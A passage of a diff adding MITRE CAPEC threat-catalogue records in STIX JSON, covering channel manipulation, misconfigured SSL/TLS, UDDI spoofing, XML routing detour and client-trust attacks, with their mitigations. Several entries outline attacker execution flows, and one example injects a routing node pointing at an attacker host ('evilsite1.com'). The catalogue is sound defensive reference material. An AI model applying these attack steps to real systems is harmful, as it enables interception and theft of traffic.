+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3b7fd0f-034a-4c49-b011-83527159115d", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4fec7a6-c3eb-48d8-b840-e4fad7c771c8", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2827e6fe-cb69-4bb9-a62c-a073e37c5f85", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3205de43-5293-4d4e-9d84-74590957951a", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3fad702-176c-4e46-ad84-47ac9e37f083", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f23b69e-8624-4f1f-b185-f98b16b4714f", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3df53c6f-ed1d-45c8-9248-169adc95cc23", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d72a7c6c-d377-4769-b5de-86fe57fc39cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac6b5101-4c5f-42e5-9d3c-ebee7b25bae7", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.", + "external_references": [ + { + "external_id": "CAPEC-216", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/216.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + } + ], + "id": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Communication Channel Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful Communication Channel Manipulation attack can result in sensitive information exposure to the adversary, thereby compromising the communication channel's confidentiality.)" + ], + "Integrity": [ + "Read Data (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)", + "Modify Data (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)", + "Other (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf" + ], + "x_capec_prerequisites": [ + "The target application must leverage an open communications channel.", + "The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)." + ], + "x_capec_resources_required": [ + "A tool that is capable of viewing network traffic and generating custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt all sensitive communications using properly-configured cryptography.", + "id": "course-of-action--6d7d16e2-5680-47ba-942a-5b43c3541123", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c654fbc8-bc2b-454c-9398-3918f016c72b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d7d16e2-5680-47ba-942a-5b43c3541123", + "target_ref": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design the communication system such that it associates proper authentication/authorization with each channel/message.", + "id": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4825728c-cd47-4e1a-a705-02257ab81012", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "target_ref": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of incorrectly configured SSL/TLS communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.", + "external_references": [ + { + "external_id": "CAPEC-217", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/217.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploiting Incorrectly Configured SSL/TLS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "Using MITM techniques, an adversary launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the adversary to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of either the server or client being targeted, preferably both. This is not a hard requirement, as the adversary can simply assume commonly exploitable configuration settings and indiscriminately attempt them.

    2. Techniques
    If the target is a webpage, some of the SSL/TLS configuration can be viewed through the browser's security information, such as the key sizes and cipher being used.

Experiment

  1. Intercept Communication: Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94).

    2. Techniques
    Create a malicious webpage that looks identical to the target webpage, but routes client traffic to the server such that the adversary can observe the traffic and perform an adverary in the middle attack.
    If the adversary has access to the network that either the client or server is on, the can attempt to use a packet sniffer to perform an adversary in the middle attack.
    Install a packet sniffer through malware directly to a client device that can intercept SSL/TLS traffic and perform an adversary in the middle attack.

Exploit

  1. Capture or Manipulate Sensitive Data: Once the adversary has the ability to intercept the secure communication, they exploit the incorrectly configured SSL to view the encrypted communication. The adversary can choose to just record the secure communication or manipulate the data to achieve a desired effect.

    2. Techniques
    Use known exploits for old SSL and TLS versions.
    Use known exploits for weak ciphers such as DES and RC4.
", + "x_capec_extended_description": "SSL/TLS communications become vulnerable to this attack when they use outdated versions and insecure ciphers. Currently, all SSL versions are deprecated and TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still possible for later versions of TLS to be insecure if they are configured with insecure ciphers such as 3DES or RC4.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the client/server stream." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time." + ], + "x_capec_skills_required": { + "High": "The adversary needs real-time access to network traffic in such a manner that the adversary can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use SSL, as all SSL versions have been broken and should not be used. If TLS is not an option for the client or server, consider setting timeouts on SSL sessions to extremely low values to lessen the potential impact.", + "id": "course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2583ad8a-c999-41fc-ba51-e6d47cfaa595", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only use TLS version 1.2+, as versions 1.0 and 1.1 are insecure.", + "id": "course-of-action--64ad9ea6-5378-4644-adf8-e1788b83cab1", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8616772d-cdb6-4317-a72a-76198cdb6d8e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64ad9ea6-5378-4644-adf8-e1788b83cab1", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure TLS to use secure algorithms. The current recommendation is to use ECDH, ECDSA, AES256-GCM, and SHA384 for the most security.", + "id": "course-of-action--8127fe7e-3325-43cc-950b-3de6a289cc83", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7ade11c3-680d-4f17-9cad-323b3972dc32", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8127fe7e-3325-43cc-950b-3de6a289cc83", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.", + "external_references": [ + { + "external_id": "CAPEC-218", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/218.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + } + ], + "id": "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Spoofing of UDDI/ebXML Messages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted business's UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit." + ], + "x_capec_resources_required": [ + "The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Clients should only trust UDDI, ebXML, or similar messages that are verifiably signed by a trusted party.", + "id": "course-of-action--e81399e0-9916-4bcb-8fea-d187cf0442c3", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-218-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46bb69df-9433-4e40-8785-079dcc99916b", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e81399e0-9916-4bcb-8fea-d187cf0442c3", + "target_ref": "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Adversary in the Middle type attacks (CAPEC-94). The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of their choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.", + "external_references": [ + { + "external_id": "CAPEC-219", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/219.html" + }, + { + "external_id": "CWE-441", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-610", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/610.html" + }, + { + "description": "Routing Detour", + "external_id": "32", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Routing-Detour" + }, + { + "description": "XML Entity Expansion", + "external_id": "44", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Entity-Expansion" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-80", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246956/Routing-Detour" + }, + { + "description": "Andre Yee, Threat Protection in a Service Oriented World, NFR Security", + "external_id": "REF-81", + "source_name": "reference_from_CAPEC", + "url": "http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf" + }, + { + "description": "Pete Lindstrom, Attacking & Defending Web Services, 2002, SPiRE Security", + "external_id": "REF-65", + "source_name": "reference_from_CAPEC", + "url": "http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf" + } + ], + "id": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XML Routing Detour Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction).\n Example SOAP message with routing information in header:\n \n http://example1.com/\n http://example4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router \n \n ...\n \n Add an additional node (example3.com/router) to the XML path in a WS-Referral message\n http://example2.com/router\n \n http://example3.com/router\n \n Resulting in the following SOAP Header:\n \n http://example1.com/\n http://example4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router\n http://example3.com/router\n \n ...\n \n Continuing with this example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that they have targeted.\n Example of WS-Referral based WS-Routing injection of the bogus node route:\n \n http://example2.com/router\n \n http://evilsite1.com/router\n \n Resulting XML Routing Detour attack:\n \n http://example_0.com/\n http://example_4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router\n http://evilesite1.com/router\n http://example3.com/router\n \n ...\n \n Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents).\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using command line or an automated tool, an attacker records all instances of web services to process XML requests.

    2. Techniques
    Use automated tool to record all instances to process XML requests or find exposed WSDL.
    Use tools to crawl WSDL

Experiment

  1. Identify SOAP messages that have multiple state processing.: Inspect instance to see whether the XML processing has multiple stages or not.

    2. Techniques
    Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not.

Exploit

  1. Launch an XML routing detour attack: The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).

    2. Techniques
    The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The targeted system must have multiple stages processing of XML content." + ], + "x_capec_resources_required": [ + "The attacker must be able to insert or compromise a system into the processing path for the transaction." + ], + "x_capec_skills_required": { + "Low": "To inject a bogus node in the XML routing table" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.", + "id": "course-of-action--32d253b1-9a81-4e1f-9e76-b03889c23824", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-219-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--50e9645d-eacc-4146-b4c7-2d3fccb9d553", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32d253b1-9a81-4e1f-9e76-b03889c23824", + "target_ref": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use SSL for connections between all parties with mutual authentication.", + "id": "course-of-action--a5db9d2f-be59-4342-b37c-e5716afbb21d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-219-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad2e36bd-7078-49d5-84e3-b333131d9839", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a5db9d2f-be59-4342-b37c-e5716afbb21d", + "target_ref": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.", + "external_references": [ + { + "external_id": "CAPEC-22", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Exploiting Trust in Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.", + "Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.", + "Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.", + "Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_prerequisites": [ + "Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server" + ], + "x_capec_skills_required": { + "Medium": "The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.", + "id": "course-of-action--2e4bbf17-d58f-437c-921e-69938467c2d2", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef29ae67-0988-4232-84e9-43b9c15d46eb", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e4bbf17-d58f-437c-921e-69938467c2d2", + "target_ref": 